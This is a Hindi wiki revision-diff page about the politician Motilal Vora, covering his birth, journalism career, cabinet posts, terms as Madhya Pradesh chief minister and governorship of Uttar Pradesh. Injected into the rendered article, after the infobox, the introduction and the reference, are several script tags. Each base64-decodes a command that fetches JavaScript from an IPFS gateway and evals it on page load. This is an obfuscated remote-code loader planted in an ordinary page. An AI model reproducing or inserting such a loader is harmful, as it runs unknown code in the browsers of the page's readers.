Difference between revisions of "मोतीलाल वोरा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 17: Line 17:
 
|प्रसिद्धि=  
 
|प्रसिद्धि=  
 
|पार्टी=
 
|पार्टी=
|पद=[[राज्यपाल]] ([[उत्तर प्रदेश]]), [[मुख्यमंत्री]] (मध्य प्रदेश)
+
|पद=
 
|भाषा=
 
|भाषा=
 
|जेल यात्रा=
 
|जेल यात्रा=
|कार्य काल=[[26 मई]], [[1993]] से [[3 मई]], [[1996]] तक
+
|कार्य काल=[[मुख्यमंत्री]], [[मध्य प्रदेश]] (दो बार)<br />
 +
प्रथम- [[13 मार्च]] [[1985]] से [[13 फ़रवरी]] [[1988]] तक<br />
 +
द्वितीय- [[25 जनवरी]] [[1989]] से [[8 दिसंबर]] [[1989]] तक<br />
 +
[[राज्यपाल]], [[उत्तर प्रदेश]] - [[26 मई]], [[1993]] से [[3 मई]], [[1996]] तक
 
|विद्यालय=  
 
|विद्यालय=  
 
|शिक्षा=
 
|शिक्षा=
Line 36: Line 39:
 
'''मोतीलाल वोरा''' ([[अंग्रेज़ी]]: ''Motilal Vora'' जन्म- [[20 दिसम्बर]], [[1928]], [[नागौर ज़िला]], [[राजस्थान]]) [[मध्य प्रदेश]] के मुख्यमंत्री व [[उत्तर प्रदेश]] के [[राज्यपाल]] थे।<ref>{{cite web |url=http://upgovernor.gov.in/hindi_version/vorabio_H.htm |title=श्री मोतीलाल वोरा |accessmonthday= 08 अक्टूबर|accessyear= 2016|last= |first= |authorlink= |format= |publisher=upgovernor.gov.in |language=हिंदी }}</ref>
 
'''मोतीलाल वोरा''' ([[अंग्रेज़ी]]: ''Motilal Vora'' जन्म- [[20 दिसम्बर]], [[1928]], [[नागौर ज़िला]], [[राजस्थान]]) [[मध्य प्रदेश]] के मुख्यमंत्री व [[उत्तर प्रदेश]] के [[राज्यपाल]] थे।<ref>{{cite web |url=http://upgovernor.gov.in/hindi_version/vorabio_H.htm |title=श्री मोतीलाल वोरा |accessmonthday= 08 अक्टूबर|accessyear= 2016|last= |first= |authorlink= |format= |publisher=upgovernor.gov.in |language=हिंदी }}</ref>
  
*इनका जन्म [[राजस्थान]] के [[नागौर ज़िला|नागौर जिले]] में [[20 दिसम्बर]], [[1928]] में हुआ था।
+
*मोतीलाल वोरा का जन्म [[राजस्थान]] के [[नागौर ज़िला|नागौर जिले]] में [[20 दिसम्बर]], [[1928]] में हुआ था। उन्होंने [[रायपुर]] और [[कलकत्ता]] से शिक्षा प्राप्त की।
*उन्होंने [[रायपुर]] और [[कलकत्ता]] से शिक्षा प्राप्त की।
+
*उनके [[माता]]-[[पिता]] मोहनलाल वोरा और अंबा बाई थे।
*उनके माता-पिता मोहनलाल वोरा और अंबा बाई थे।
+
*मोतीलाल वोरा का [[विवाह]] शांति देवी वोरा से हुआ।
*उनका विवाह शांति देवी वोरा से हुआ।
+
*अनेक वर्षो तक पत्रकारिता के क्षेत्र में कार्य करते हुए मोतीलाल वोरा ने कई समाचार पत्रों का प्रतिनिधित्व किया।
*उन्होंने अनेक वर्षो तक पत्रकारिता के क्षेत्र में कार्य करते हुए कई समाचार पत्रों का प्रतिनिधित्व किया।
+
*सन [[1968]] में वे राजनीतिक क्षितिज पर उभर कर आये।
*ये [[1968]] में राजनीतिक क्षितिज पर उभर कर आये।
 
 
*उन्होंने [[1972]] में [[मध्य प्रदेश]] [[विधान सभा]] से चुनाव जीता और मध्य प्रदेश राज्य सड़क परिवहन निगम के उपाध्यक्ष नियुक्त हुए।
 
*उन्होंने [[1972]] में [[मध्य प्रदेश]] [[विधान सभा]] से चुनाव जीता और मध्य प्रदेश राज्य सड़क परिवहन निगम के उपाध्यक्ष नियुक्त हुए।
*इसके बाद [[1977]] और [[1980]] में पुनः मध्य प्रदेश विधान सभा में चुने गये।
+
*बाद में [[1977]] और [[1980]] में मोतीलाल वोरा पुनः मध्य प्रदेश विधान सभा में चुने गये।
*सन [[1980]] में अर्जुन सिंह मंत्रिमण्डल में उन्हें उच्च शिक्षा विभाग का दायित्व सौंपा गया।
+
*सन [[1980]] में [[अर्जुन सिंह]] मंत्रिमण्डल में उन्हें उच्च शिक्षा विभाग का दायित्व सौंपा गया था।
*ये [[1983]] में केबिनेट मंत्री हुए। इसके बाद वे मध्य प्रदेश कांग्रेस कमेटी के अध्यक्ष नियुक्ति हुए।
+
*मोतीलाल वोरा [[1983]] में केबिनेट मंत्री हुए। इसके बाद वे मध्य प्रदेश कांग्रेस कमेटी के अध्यक्ष नियुक्ति हुए।
 
*[[13 मार्च]], [[1985]] में श्री मोतीलाल वोरा मध्य प्रदेश के मुख्यमंत्री बने।
 
*[[13 मार्च]], [[1985]] में श्री मोतीलाल वोरा मध्य प्रदेश के मुख्यमंत्री बने।
 
*[[13 फ़रवरी]], [[1988]] में इन्होंने मुख्यमंत्री पद से त्याग पत्र देकर [[14 फ़रवरी]], [[1988]] में केन्द्र में स्वास्थ्य परिवार कल्याण और नागरिक उड्डयन मंत्रालय का कार्यभार ग्रहण किया।
 
*[[13 फ़रवरी]], [[1988]] में इन्होंने मुख्यमंत्री पद से त्याग पत्र देकर [[14 फ़रवरी]], [[1988]] में केन्द्र में स्वास्थ्य परिवार कल्याण और नागरिक उड्डयन मंत्रालय का कार्यभार ग्रहण किया।
 
*[[अप्रैल]] [[1988]] में वे [[मध्य प्रदेश]] से [[राज्यसभा]] के लिये चुने गये।
 
*[[अप्रैल]] [[1988]] में वे [[मध्य प्रदेश]] से [[राज्यसभा]] के लिये चुने गये।
 
*श्री मोतीलाल वोरा ने [[26 मई]], [[1993]] से [[3 मई]], [[1996]] तक [[उत्तर प्रदेश के राज्यपाल]] के पद पर आसीन रहे।
 
*श्री मोतीलाल वोरा ने [[26 मई]], [[1993]] से [[3 मई]], [[1996]] तक [[उत्तर प्रदेश के राज्यपाल]] के पद पर आसीन रहे।
 
 
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
Line 57: Line 57:
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{उत्तर प्रदेश के राज्यपाल}}
+
{{मध्य प्रदेश के मुख्यमंत्री}}{{उत्तर प्रदेश के राज्यपाल}}
[[Category:उत्तर प्रदेश के राज्यपाल]][[Category:राज्यपाल]][[Category:मध्य प्रदेश के मुख्यमंत्री]][[Category:मध्य प्रदेश]][[Category:जीवनी साहित्य]][[Category:चरित कोश]][[Category:इतिहास कोश]]
+
[[Category:उत्तर प्रदेश के राज्यपाल]][[Category:राज्यपाल]][[Category:मध्य प्रदेश के मुख्यमंत्री]]
 +
[[Category:मध्य प्रदेश]][[Category:मुख्यमंत्री]][[Category:भारतीय राज्यों के मुख्यमंत्रियों की सूची]][[Category:राजनीतिज्ञ]][[Category:राजनेता]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:जीवनी साहित्य]][[Category:राजनीति कोश]][[Category:चरित कोश]][[Category:प्रसिद्ध व्यक्तित्व कोश]]
 
__INDEX__
 
__INDEX__

Revision as of 10:16, 18 October 2020

motilal vora
poora nam motilal vora
janm 20 disambar, 1928
janm bhoomi nagaur zila, rajasthan
abhibhavak pita- mohanalal vora, mata- aanba baee
pati/patni patni- shaanti devi vora
nagarikata bharatiy
kary kal mukhyamantri, madhy pradesh (do bar)

pratham- 13 march 1985 se 13 faravari 1988 tak
dvitiy- 25 janavari 1989 se 8 disanbar 1989 tak
rajyapal, uttar pradesh - 26 mee, 1993 se 3 mee, 1996 tak

any janakari 13 march, 1985 mean motilal vora madhy pradesh ke mukhyamantri bane tatha 13 faravari, 1988 mean inhoanne mukhyamantri pad se tyag patr de diya.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

motilal vora (aangrezi: Motilal Vora janm- 20 disambar, 1928, nagaur zila, rajasthan) madhy pradesh ke mukhyamantri v uttar pradesh ke rajyapal the.[1]

  • motilal vora ka janm rajasthan ke nagaur jile mean 20 disambar, 1928 mean hua tha. unhoanne rayapur aur kalakatta se shiksha prapt ki.
  • unake mata-pita mohanalal vora aur aanba baee the.
  • motilal vora ka vivah shaanti devi vora se hua.
  • anek varsho tak patrakarita ke kshetr mean kary karate hue motilal vora ne kee samachar patroan ka pratinidhitv kiya.
  • san 1968 mean ve rajanitik kshitij par ubhar kar aye.
  • unhoanne 1972 mean madhy pradesh vidhan sabha se chunav jita aur madhy pradesh rajy s dak parivahan nigam ke upadhyaksh niyukt hue.
  • bad mean 1977 aur 1980 mean motilal vora punah madhy pradesh vidhan sabha mean chune gaye.
  • san 1980 mean arjun sianh mantrimandal mean unhean uchch shiksha vibhag ka dayitv sauanpa gaya tha.
  • motilal vora 1983 mean kebinet mantri hue. isake bad ve madhy pradesh kaangres kameti ke adhyaksh niyukti hue.
  • 13 march, 1985 mean shri motilal vora madhy pradesh ke mukhyamantri bane.
  • 13 faravari, 1988 mean inhoanne mukhyamantri pad se tyag patr dekar 14 faravari, 1988 mean kendr mean svasthy parivar kalyan aur nagarik uddayan mantralay ka karyabhar grahan kiya.
  • aprail 1988 mean ve madhy pradesh se rajyasabha ke liye chune gaye.
  • shri motilal vora ne 26 mee, 1993 se 3 mee, 1996 tak uttar pradesh ke rajyapal ke pad par asin rahe.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. shri motilal vora (hiandi) upgovernor.gov.in. abhigaman tithi: 08 aktoobar, 2016.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh